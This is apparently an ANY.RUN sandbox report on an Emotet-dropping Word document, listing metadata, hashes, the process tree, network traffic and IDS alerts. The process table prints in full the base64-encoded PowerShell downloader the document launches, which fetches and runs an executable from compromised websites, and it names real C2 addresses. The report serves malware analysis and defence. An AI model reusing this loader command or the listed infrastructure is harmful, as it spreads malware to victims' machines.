File name: | INF_931516975144_B.doc |
Full analysis: | https://app.any.run/tasks/92a10c09-53ae-44c2-9ea3-cdf2655a823c |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 18, 2019, 15:12:59 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Chief Djibouti Franc, Subject: compress, Author: Armani Hilpert, Comments: payment, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 07:25:00 2019, Last Saved Time/Date: Wed Sep 18 07:25:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0 |
MD5: | 9DE79DFC8DE476A5F3908F934B33A937 |
SHA1: | 24AEC1C262EA541FA3E5AE18A3C82CD5D80F5C60 |
SHA256: | 5D9074F7B096F8E2BEEF12ADCC34389826FD7047E6DB1B7AD7987B6426660345 |
SSDEEP: | 6144:sdqTwyusD0F/rbS3+c2xYbP/g9XWePLkIi7NSU4jJntATfDElzMI:sdqTwyusD0F/rbS3+cMYbP/g9XWcXi7a |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Chief Djibouti Franc |
---|---|
Subject: | compress |
Author: | Armani Hilpert |
Keywords: | - |
Comments: | payment |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:09:18 06:25:00 |
ModifyDate: | 2019:09:18 06:25:00 |
Pages: | 1 |
Words: | 95 |
Characters: | 547 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Kassulke and Sons |
Lines: | 4 |
Paragraphs: | 1 |
CharCountWithSpaces: | 641 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Harber |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2880 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\INF_931516975144_B.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3792 | powershell -encod JABEAEkAaQBNAE0AdwBkAFAAPQAnAHAAdwA3ADkAVQBWADUATgAnADsAJAByADgAOQBCAHEAdgA5AE0AIAA9ACAAJwA1ADIAMwAnADsAJAB6ADEAbwBaAGkARABqAD0AJwBPAGwAXwBxAG0ARQBDACcAOwAkAEwAagA2AEoAbABMAEgAegA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAcgA4ADkAQgBxAHYAOQBNACsAJwAuAGUAeABlACcAOwAkAHEAdAA0AEUAbgA2AEQAQgA9ACcAUgAzAHYAcQBpAFMARgBUACcAOwAkAEMAaQBJAEwAawBIAFUAbwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgB3AEUAYgBDAEwASQBFAE4AdAA7ACQAcQBXAEcAXwBqAHoAWgBWAD0AJwBoAHQAdABwADoALwAvAHMAaABhAGUAbAAuAG8AcgBnAC8AaABvAHMAdABpAG4AZwAvAFQAWQBYAGMAaABjAEsAawBIAHoALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBsAG8AdAB0AGkAegB6AGEAegBpAG8AbgBlAHMAYQB2AGEAcgByAGEALgBpAHQALwB3AHAALQBhAGQAbQBpAG4ALwB6AE0AaQBmAFoARABQAHUAcgAvAEAAaAB0AHQAcABzADoALwAvAGgAZQByAHIAZQBuAG0AbwBkAGUALgB0AGsALwA1AHUAcwBxAGoAbABlAHcALwB0AHQAZwAyADIAegBjAGYAXwBxADUAYwBoAG8AdgAtADMANwA3ADIAMQA1AC8AQABoAHQAdABwADoALwAvAG4AZgBiAGkAbwAuAGMAbwBtAC8AaQBtAGcALwB1AHAAbABvAGEAZABfAEkAbQBhAGcAZQAvAGUAZABtAC8AcABpAGMAXwAyAC8AdQA2AHEANAB1AGMAcQA3AF8AaAB5AGcAOAB1AHoAaABoAC0AMwA2ADkAOQA2ADMANQA1ADkALwBAAGgAdAB0AHAAOgAvAC8AZQBuAGQAbwBmAGgAaQBzAHIAbwBwAGUALgBuAGUAdAAvADIAMAAwADgALQAwADgAXwBQAFMAQgBlAGEAcgBEAG8AbgBhAHQAZQAvAHEAbQBpAHUATwBaAHYARABqAC8AJwAuACIAUwBwAGAATABpAFQAIgAoACcAQAAnACkAOwAkAGwAdAA1AHIARQBwAE0AegA9ACcATgBUAE0AUABzAEYAaQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQQBrAE8AWgBQAHoAVwAgAGkAbgAgACQAcQBXAEcAXwBqAHoAWgBWACkAewB0AHIAeQB7ACQAQwBpAEkATABrAEgAVQBvAC4AIgBkAE8AYAB3AGAATgBsAGAAbwBBAGQAZgBpAGwAZQAiACgAJABBAGsATwBaAFAAegBXACwAIAAkAEwAagA2AEoAbABMAEgAegApADsAJABsAFcAZABEADQATwA9ACcAdgBiAFgAaAB3AE0ANgAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAEwAagA2AEoAbABMAEgAegApAC4AIgBMAGAAZQBOAGcAVABIACIAIAAtAGcAZQAgADIANAA4ADEANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYQBgAFIAdAAiACgAJABMAGoANgBKAGwATABIAHoAKQA7ACQASwBfADAAdABRAHcAbwBiAD0AJwBhADkAZAB2AEsARwBHAGIAJwA7AGIAcgBlAGEAawA7ACQAQgBjAFIASABSAFYANAA9ACcARgBTAEEAbQBSAFYANgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABFAHIAWgBjAE4ASAA9ACcAdwBuAFcAcQBGAGQAXwBhACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3568 | "C:\Users\admin\523.exe" | C:\Users\admin\523.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2776 | "C:\Users\admin\523.exe" | C:\Users\admin\523.exe | — | 523.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2908 | --d05e77b4 | C:\Users\admin\523.exe | — | 523.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3680 | --d05e77b4 | C:\Users\admin\523.exe | 523.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3060 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | 523.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2928 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
504 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2780 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | easywindow.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
2880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRAF6F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C8FA936A.wmf | wmf | |
MD5:1F91F77BA7A9D2668AAB2E9AA318445F | SHA256:1209E7B869BF546F5E463A53AACE1B98E8DB1ABB0BADA6775E7F6E598AA8395E | |||
2880 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D6B192C1DCDE3687748D0876A16156DF | SHA256:73DDE2010D6F0410B3867CC2D18D79BE1822A4A5B6954AEF7BE5F4252980352E | |||
2880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6E68BF1.wmf | wmf | |
MD5:C79FAE111514EF6C44BC483F2FCAF326 | SHA256:24359103CAF24FE170B841F760CCA155AB6E95DC34FBF8C59A1B93509FC8E2A3 | |||
2880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F55F87CD.wmf | wmf | |
MD5:471CAE0A8DBA69FE95345531EF1B0ECA | SHA256:BEFDF361E8F16DA86351089B70243C643C3ED649D077433F861917E55C0AAB83 | |||
2880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4481C9E1.wmf | wmf | |
MD5:B12C70F4A0AF6EEBEF3C9695128B6AE1 | SHA256:6CC2EA8977A82B266EB25A7EF28E10A11244D63C99C6EF63687308716045C1E0 | |||
2880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\587A2AC5.wmf | wmf | |
MD5:C26D37C340831F7B8E5DDBA5C41CD9A5 | SHA256:CFFBC500B5386BC639921E68ED44E5E5B8B1CEBEC3AE1DC8BF3466F66CADA859 | |||
2880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$F_931516975144_B.doc | pgc | |
MD5:B0DF0AA3ACF7976827CE3941298C95E0 | SHA256:D009915CA1A159393ADF452053F03E3053BD4BE41A30B16EF5261D619FFBC689 | |||
2880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70CFB863.wmf | wmf | |
MD5:13F48702314854E6F39B1A7007C95DF0 | SHA256:EA6F3677BD7CB018C8D2709254DE4EAD255420ACBD66132DF1202485C4DCC1B8 | |||
2880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\213E.wmf | wmf | |
MD5:DEF42698C657D7E5F51FA8DB7CA7CB61 | SHA256:CB6D088E8D321C39749390E75E14F6E660E166F88B6D11DD0883F0BF2F793001 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3792 | powershell.exe | GET | 200 | 89.46.105.48:80 | http://www.lottizzazionesavarra.it/wp-admin/zMifZDPur/ | IT | executable | 404 Kb | suspicious |
2780 | easywindow.exe | POST | — | 59.152.93.46:443 | http://59.152.93.46:443/splash/psec/ | BD | — | — | malicious |
2780 | easywindow.exe | POST | 200 | 178.254.6.27:7080 | http://178.254.6.27:7080/entries/entries/nsip/ | DE | binary | 81.0 Kb | malicious |
2780 | easywindow.exe | POST | 200 | 178.254.6.27:7080 | http://178.254.6.27:7080/schema/entries/nsip/ | DE | binary | 148 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3792 | powershell.exe | 89.46.105.48:80 | www.lottizzazionesavarra.it | Aruba S.p.A. | IT | suspicious |
2780 | easywindow.exe | 185.129.92.210:7080 | — | Bravo Online Systems LLC | AZ | malicious |
2780 | easywindow.exe | 91.92.191.134:8080 | — | Information Technology Company (ITC) | IR | malicious |
3792 | powershell.exe | 156.67.209.58:80 | shael.org | Hostinger International Limited | SG | unknown |
2780 | easywindow.exe | 59.152.93.46:443 | — | Zipnet Limited DKB AS number | BD | malicious |
2780 | easywindow.exe | 178.254.6.27:7080 | — | EVANZO e-commerce GmbH | DE | malicious |
Domain | IP | Reputation |
---|---|---|
shael.org |
| malicious |
www.lottizzazionesavarra.it |
| suspicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3792 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3792 | powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
3792 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3792 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2780 | easywindow.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
2780 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2780 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2780 | easywindow.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
2780 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2780 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |